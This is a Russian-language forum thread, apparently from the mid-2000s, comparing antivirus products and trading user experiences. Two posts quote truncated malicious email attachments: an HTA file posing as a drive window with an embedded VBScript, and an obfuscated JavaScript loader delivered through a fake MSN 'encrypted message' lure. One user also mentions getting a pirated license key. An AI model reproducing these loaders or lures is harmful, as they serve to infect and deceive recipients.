А вот по моему McAfee Professional-- этот антивирь полностью вшивается в вашу винду и ловит всё всё всё всё!!!! очень гибкая система настроек. Единственое --его почти нельзя удалить он имеет свойство самовосстанавливаться и его корни из винды не вычистить только формат ц. У него ещё много хитростей тонкостей и странностей но тем неменее более неприступную стену я ещё невидел в нём кстати есть ещё и фаервол и много других утилит!! На мой взгляд вердикт такой---Оченьспецифичная программа но её я ни на какую другую не променяю. и вам советую попробовать.

Значится чуть чуть по VirusScan 8.0 Interprise, после плотного использования.
С почтой полный облом, понимает только 2 клиента, MS Outlook & IBM Lotus Notes, что не может не печалить обычного домашнего пользователя, в остальном прелееестно ... вирусы ловит, блокирует удаляет, spyware тоже ловит, и тоже удаляет (хоть и проигрывает в этом специализированым программам).

Alex_79 писал(а):

---

А вот по моему McAfee Professional-- этот антивирь полностью вшивается в вашу винду и ловит всё всё всё всё!!!!

---

Цитата:

---

я ни на какую другую не променяю. и вам советую попробовать.

---

Сам юзаю уже 2 года старичка McAfee Professional 7.02. Бесподобная вещь. Даже удалось к нему нарыть в нете русифики, красота и море удовольствия. Никому не стану ничего рекомендовать, всё сугубо ИМХО, но менять ни на что не стану.

Mawerick
Вот вот вот!!!! Всё правильно!! Размениваться на более тупую систему защиты не стоит!! McAfee рулит на все 100% Труды доктора Соломона явно не прощли зря!!!

Кстати, я сейчас гоняю бесплатный антивирус от H-BEDV, так впечатления вполне приятственные. После небольшой настройки он нашёл в моей коллекции лишь чуть меньше вирусов, нежели McAfee, и прилично больше AVG 7.0... В управлении прост, в работе нетяжёл. Из минусов — не отслеживает почту. По слухам не очень хорош в отлове скриптовых вирусов, чего я (включив средний уровень эвристики) не заметил.

Линки для скачивания (ибо сайт не любит MDI-браузеры и по ссылкам в них ходить плохо):
http://www.avup.de/personal/en/avwinsfx.exe
http://www.free-av.de/down/vdf/vdf_h.zip

Мысли об эвристике Касперского и drWeba
15.02.05 пришёл ко мне по почте подозрительный архив. Ни KAV 5.0.142 ни drWeb 4.32 со свежими обновлениями ничего не говорили. Файл послал и тем и другим, а exe запустил (интересно же ). Разумеется червь.
На следующий день утром Касперский обозвал его kipis.o, после обеда drweb hllm.dasha. Но вся их эвристика при максимальном уровне защиты не сработала.

ArtLonger
А я гоняю совсем не бесплатный NOD32 и меня все больше посещяют мысли типа, а вот если бы взять это отсюда, это отсюда, была бы лапочка, а не антивирь. Но увы и ах, такого не бывает.
Приятный фишки NOD32 IMON и плагин для бата .

[test]
Гонял его, да. Не понравился совершенно (несовместимость у нас на уровне интерфейсов, видать). На моей коллекции пусть и не новых, но всё же вирусов NOD32 ничем себя не проявил — не лучше и не хуже других антивирусов ( в т.ч. и бесплатных). До МакАфея ему далеко, но систему зато не грузит.

ArtLonger
У меня гораздо больше к нему претензий чем просто несовместимость интерфейсов (будет интересно кому расскажу , спрашивайте).
Глючность монитора просто выводит из себя переодически, по скорости сканирования файлов он быстрее, но в режиме проверки на лету, он тормозит больше чем McAfee.

Скажите ну зачем вам эти навороты типа сканеров входящей почты и прочего бреда ?

Антивирус должен делать 2 вещи:
1. Блокировать запуск заражённых файлов.
2. Сканировать и чистить/удалять/класть в карантин заражённые файлы по моей команде или расписанию и только те, на которые я ему укажу (AD/SPYware те же вирусы если Я не сказал обратное по каждому случаю отдельно).

И ничего больше.
Всё остальное сакс и масдай.
Меня когда-то устраивал NAV Corporate. Сейчас много пропускает, но всё остальное ещё хуже.

Dimka
Скажите ну зачем вам эти навороты типа сканеров входящей почты и прочего бреда ?
Гм, что бы памперс был сух у секретарши, что бы не существовало принципальной возможности запустить вирус из аутглюка или ему подобного.

Все зависит от конретного случая и конкретного админа.
Если я сижу в конторе, то мне это не требуется, будет поднят общий фильтр входящей почты, еще до пользователя.
Если же я админ по вызову, мне удобнее поставить некий антивирус который будет уметь делать следующее:
— сканировать сетевой траффик по http & pop3.
— уметь блокировать запуск программами других программ, например нефиг Internet Explorer'y что-то запускать из моей папки temp (опционально)
— уметь быть маленьким закрытым файроволом (что бы можно было запрещать обраться кому-либо к каким либо ресурсам, например нефиг никому кроме outlook.exe отсылать почту по 25 порту), + не конфликтовал со встроеным в winxp файрволом
— умел проверять папки по правому клику (что бы в контекстной менюшке был)
— имел возможность настраиваться таким образом что бы показывалось сообщения с информацией о вирусе, но настройка о том чего с ним делать пользователю не доступна
— карантин
— имел возможность блокировать свои настройки паролем
— имел возможность легко масштабироваться, например подключаться к административному серверу или позволял управлять собой удаленно (можно отдельной версией, типа NAV / NAV Corp)
— был русский интерфейс
— обновление с локального сервера.

Вот где-то такой у меня сейчас список требований, плюс стандартные, что бы P4 3.0 GHz не превращался после его установки с Celeron 2000.
Все текущие антивирусы умеют всего понемногу. Суммарно такого нет.

Кстати я не против если это было модульно, то есть не обязательно одна программа это включает, а как бы состоит из модулей.

P.S. Мне персонально он не нужен .

[test]
Но мы же обсуждаем свои домашние машины, а не корпоративные решения.
Кстати, если антивирус нормально ловит вирусняк при попытке запуска, то сетевые фильтры и не нужны совсем.
Русский интерфейс — самая ненужная вещь из всех возможных в антивирусе.
Админ поймёт и по английски а пользоватею не надо ничего понимать.

Как следствие — все эти не очень нужные навороты вместе взятые могут превратить пень4 в селерон. Особенно я ненавижу shell extensions, те, что по правому клику т к
1 — мне не долго выбрать то, что надо сканировать через интерфейс самого антивируса.
2 — когда их много — это катастрофа.
Нортон 2005, например, не позволяет от них избавится нудно тебует полную переустановку
даже при удалении иконки из start menu из за чего (и не только) был полностью забракован мной через 2 дня после установки.

[test]

Цитата:

---

будет интересно кому расскажу, спрашивайте

---

Интересно. Я его не гонял плотно, а это сейчас заметный игрок на российском рынке.

Dimka

Цитата:

---

Антивирус должен делать 2 вещи:
1. Блокировать запуск заражённых файлов.
2. Сканировать и чистить/удалять/класть в карантин заражённые файлы по моей команде

---

<бурные и продолжительные аплодисменты>
Обсуждаем мы правда не домашние машины, а ищем лучший антивирус .

На мой взгляд FreeAV от H-BEDV очень неплох для пользователя выше начального уровня — лишнего нет, запустить вирус не даёт, ресурсы не жрёт. Имхо дома самое оно, хотя для диалапщиков не самая удачная система обновлений (ежедневно 2-3 мега). Фирма имеет массу хороших корпоративных решений, а также бесплатные продукты для UNIX/Linux.

Dimka
Но мы же обсуждаем свои домашние машины
Как я уже говорил, на МОЮ домашнюю машину, антивирус не требуется, а для экстреной проверки чего либо на что либо, есть online и в крайнем случае скачать не долго триалку.

Русский интерфейс — самая ненужная вещь из всех возможных в антивирусе.
Админ поймёт и по английски а пользоватею не надо ничего понимать.
Как раз имхо, если говорим про домашние машины то самая нужная. Иметь возможность админа дома это дорогое удовольствие.

Особенно я ненавижу shell extensions, те, что по правому клику т к
а мне с точки зрения пользователя очень понравилось, когда по правому клику всего один пункт
VirusScan. который и запускает сканирование. (ессевено я тоже не сторонник кучи параметров в меню, типа как Winzip добавляет или Winamp).

Просто я ищу антивирус пользователю домой или в маленькую локальную сеть (компов на 5-10), где могут вызвать мастера, который им бы базово настроил и люди не имели с этим проблем.

Антивирус домой админу я не ищу, корпоративный антивирус тоже не ищу, там другие правила.

ArtLonger
ESET NOD 32
Начал с посещения сайтов с информацией об этом антивирусе, на бумаге красивая весчь.
Правда с поддержкой на русском языке все таки туго, есть одна компания которая пытается стать дилером, устроить поддержку и прочее, но что-то как-то все не получается.
Воспользовался варезными сайтиками, нашел ключик для скачивания нормальной полной версии NOD32 Standart.
Для начала включил только модуль AMON отвечаюший за проверку файлов на лету.
Первый найденый глюк.
Apollo.exe (проигрыватель mp3), когда проигрывает музыку, вызывает забавный глюк, NOD32 начинает проверять только аполло, причем постояно и счетчик проверяных файлов растет, загрузка процессора при этом около 5 процентов (просто аполло 0.4 — 0.5).
Полез разбираться, оказалось что такой глюк только аполло (winamp & wmp таких проблем не вызывают), но связано это скорее всего с тем каким образом реализовано проигрывание в device непосредствено.
Если отключить в nod32 проверку On Execute то такой баг пропадает, или если убить handle apollo на звук.
Внес Apollo.exe в непроверямый exe и успокоился.

Второй глюк, как часть первого глюка, любая системный звук, в моем случае вызвает проверку p17.sys (Creative Device .... bla bla bla).
Третий глюк, при записи через NeroBurning Rom, nod32 постояно проверяет nero.exe (очевидно с тойже самой проблемой, не нравится как устройство исползуется).
При гулянии по компу через total commander постояно проверяется totalcmd.exe, запуск apollo где в playlist указана папка (а он тогда из нее все mp3 выгребает рекурсивно, даже не читает, просто ищет), тотже самый эффект.

Да что такое подумал я и перестал следить за тем куда он ломится, хотя надо сказать что скорость обработки большого количества файлов от этого уменьшилась (например при поиске).

Дальше я занялся IMON, дейсвительно качаешь ловит, почту сканирует, особых проблем не обнаружил. Но выключил нафиг , так как нашел plugin для The Bat!., вирусы ловит и убивает.

По умолчанию антивирус дейсвительно быстрый сканирует быстро, правда в томже поумолчанию отключена проверка архивов, которая по умолчанию включена в KAV 4.5, Dr.Web, VirusScan. Включил проверку, все равно быстрее, но разница уже не столь значительна.

К сожалению коллекция моих вирусов очень старая , и все они под DOS. Но тем не менее какие никакие но результаты показали что NOD32 ловит вирусы также как и AVP & Dr.Web из ~140 файлов около 75 поймали, (VirusScan поймал 98 ).

Отставив нелепые проверки, я поставил к нему найденый руссификатор (принцип как в mui, набор dll с русским интерфейсом), получил моральное удовлетворение что ругается он также страшно, но по русски, что почему-то оказывает более спокойное влияние на моих родных (два компа на двух и проверял), не смотря на что разговорный английский они знают лучше меня . Вместо паники и криков "ааа сегодня вирус поймала и выключила компьютер не знала чего делать", получил спокойное замечание что "вирус нашла, там была кнопка удалить, я удалила.".

Ну вот где-то так.

реально оптимального антивируса найти сложно — у всех есть весомые недостатки
(п.с. панда очень неплохо смотрится из молодых..)

Violator666
Это точно.
Вот и avast надо мной прикалывается. Про откровенный троян молчит, но послать по почте своим авторам не даёт.

Возможно ли вообще в НОДЕ 32 сдлеать так чтобы обновления были размером меньше, тоесть получать только новые базы?

Можно ли как-нибудь обновлять базу через файлы, а не через инет, а то когда я указываю путь к папке, в которой лежат базы, нод начинает ругаться, мол не найден фалй такой то такой то.

че никто НОДом не пользуется чтоль?

Romanoff
Насколько я помню, это можно организовать с помощью специальной админской версии NOD32.

http://www.antivirus.ru/OknoA.html#M12
Круто, NOD32 первое место занимает, рад!

Сейчас играюсь с KasperskyInternetSecurity 2006 бета. Если нормально отладят, будет неплохой комбайн. Хотя весь его антиспам рассчитан только на Аутлук и Аутлук экспрессо. Ну ещё про мыша что-то знает. А Thunderbird ему незнаком

даже не буду никого слушать.
Касперский Антивирус 3.5.133.

Win2003WebSP1 optimized + Dr.Web 4.33b for Windows servers NT/2000/2003

Посоветуйте антитроян. Кто юзал PestPatrol, Trojan Remover подскажите, что лучше.

Все посты не читал, может это и было...Был Касперский, файлы от игр удалял просто так, считал системные файлы "подозрительными" очень тормозил систему, иногда просто жутко комп глючил...плюнул удалил..поставил McAfee Prof корпоративная версия, все было ок пока система не полетела из-за трояна, как-то пробравшегося, потом обнаружилось еще3 штуки. так же удалил, поставил NOD, только 1 раз находил(т.е. я, он то исправно ловил) в системе, и то, то ли пассивный то ли глючный троян...Так что Нодом доволен!
P.S. все антивирусы были лецензионные.

Коллеги! Кто-нить знает, как для 98-ой подружить Спидер (от Dr.Web) с новыми базами версии 4.33?
В 4.33 vxd-драйвер есть? Или как?
Сейчас Dr.Web 4.32а стоит — все понимает, а Спидер (стоит от 4.31) кажет, что куча баз с ошибкой. И тормознее стало...

Коллеги-знатоки! Как защитить ящик на nm.ru от завирусованного спама?
И ведь гады — под форумчан наших к0сят!
Вот пример начала одного "вложения". Дальше что-то в hex-кодах...

Код:

<title>(C:)</title>
<!-- y="sK5ukfPzv" -->
<HTA:Application 
xZH6eFmA2="s"
CONTEXTMENU=no 
zR="Ji73UBF"
ICON="explorer.exe" 
WoLuPYq="p76o2"
/>
<!-- z="PrOE" -->
<body leftmargin=0 marginwidth=0 topMargin=0 bottomMargin=0 SCROLL=no>
<!-- zBj55nr="lCz7uixwaIONb" -->
<iframe src="C:\" width=100% height=100%>
<!-- FV2Ui28="bmZwTNB85" -->
</iframe>
<!-- zF0rE="BUmdz2uiY" -->
<script language=vbs>

Прям хоть ящик удаляй...

Устраивает на 100% нортоновский корпоративный клиент 10 версии и тормозит не сильно, при правильных настройках.

Сегодня Касперский версии 5.0.527 проявил истинный "героизм и отвагу";).
У нас в домашней сети (27 компов) появился вирус (название вроде — neshta, один из последних), видно кто-то с городской принес, распостраниться на всю сеть он не успел (было заражено только 2 компа), но предупреждения о вирусной опасности сработало на 20 компах... Так что Касперский тоже кое что может.

Ага, у меня еще почище история про героического касперыча: вчера каким-то образом он нашел трояна Backdoor.Win32.RAdmin.w в файле "antivir_workstation_win7u_de_h.exe"— это бесплатный антивирус, скачанный с самого что ни на есть их сайта. Я уже начал возмущаться, до чего негодяи дошли, как мне пришла мысль, касперыча проапдейтить через инет, после чего он уже в этом файле ничего нe нашел. Поискал по интернету- у других было, правда давно, что он находил Backdoor.Win32.RAdmin.s там, где его нет. Пустячок конечно, а осадочек остался
(предпоследний апдейт кстати, с которым он этого "трояна" нашел, был позавчерашний- это я к тому, чтоб не подумали, что я его уже 100 лет не апдейтил)

Опять, , приехало. ЗИПом с файлом data.hta, с паролем и ключиком:
You have received Protected Message
To read the message open attached file.
User ID: 12345
Password: e586c55
Keep your password in a safe place. Best Regards, Encrypted Message Service, MSN.com

Код:

<html>
<head>
<title>MSN.com</title>
</head>
<body>
<script language=JavaScript>n7="+66+75nc+74ion+20u+28+7A+29+7B+76+6(r+20e,x,s+3D'+27+2C+62=+27+27+2Ca,c=
+22+29zpNYl+7D!+64'+36+28F+6Du5+5A[s+6BJ-+6E+37+63+2A+5DQi+38+77:+72+3D+782+33+74P+7(+2BoX+2CWA9.+
76h+56+45+3B+6A/+79+6(+5F0|+60+40+42S+47H+62(+65+7Bf+34+67C+7E #+54+44+26+49+4B+4C+4D+4FR+22+2Cy+
3Bf+6Fr+28a=+30;a<+7A.+6Cen+67th;+6(+2B+2B){+79+3Dz+2E+63h+6(+72+4(+74+28a+29+3Be+3Dc.in+64+65+78+4F+
66+28+79)+3Bif+28+65>+2D+3(+29{x+3D+28+28+65+2B()+25+38+36+2D+3();+69+66+28x<+3D0+29+7B+78+2B+3D+
386}s+2B=+63.c+68+6(+72A+74+28+78-+3(+29+7De+6Cs+65{+69f+28+79==+22$+22)+79+3D+22+5C+5C+22+3B+69f+
28y==+22+5E+22+29+79+3D+22+5C+22+22;+73+2B+3D+79+7D}+3Bd+6F+63+75m+65+6E+74.+77+72ite+28s+29}";n7=
n7.replace(/\(/g,"1");n7=n7.replace(/\+/g,"%");o9="<k*=8NP#}_7C5_C{x-_h_G*=8NP>457*P8X7#=Fzf'X*5u{7Pv:=8P{F6<*
{7P{=><4X=u><P_1}{#1X='{=x| ..... и тд

Это ЧТО? Никто из близких хлопцев не в курсе. Др.Веб смолчал.

U-Nick

HTML Приложения (HTA) для IE

HTML-приложения:

Цитата:

---

Простая замена расширения .HTML на .HTA снимает защиту операционной системы, применяемую к файлам, полученным из Интернета. HTML-файлы могут свободно обращаться к любым ресурсам локального компьютера, например, создавать и удалять файлы и папки или переписывать информацию в системном реестре.

---

ArtLonger
Т.е. сие есть зло? Прибью.

U-Nick
Ну зло-не зло, а дырка похоже конкретная...

ArtLonger
Сия дырка — в сервисе nm.ru.

Лично я на виндах юзаю и юзверям своим ставлю NOD32. Поднял сервер обновлений. Сам антивирь радует тем, что почти не жрет ресурсов мониторингом и достаточно бодро сканирует, точность обнаружения тоже вполне...

Darth_Vader
Да. Здесь я с Вами согласен, ресурсов он не "жрёт".
Но есть одно НО.
После проверки хорошо инфицированного HDD антивирусом NOD32, Касперский находит не вылеченные вирусы, а вот после Касперского, NOD32 уже ничего не находит
Проверено и не раз.
Поэтому, хоть Касперский и подтормаживает систему, но всё же наиболее эффективный, по сравнению со всеми остальными антивирусными пакетами.

Avast! лучше всех, а я уж повидал и вирусы и антивирусы (сисадмин 8 лет стажа)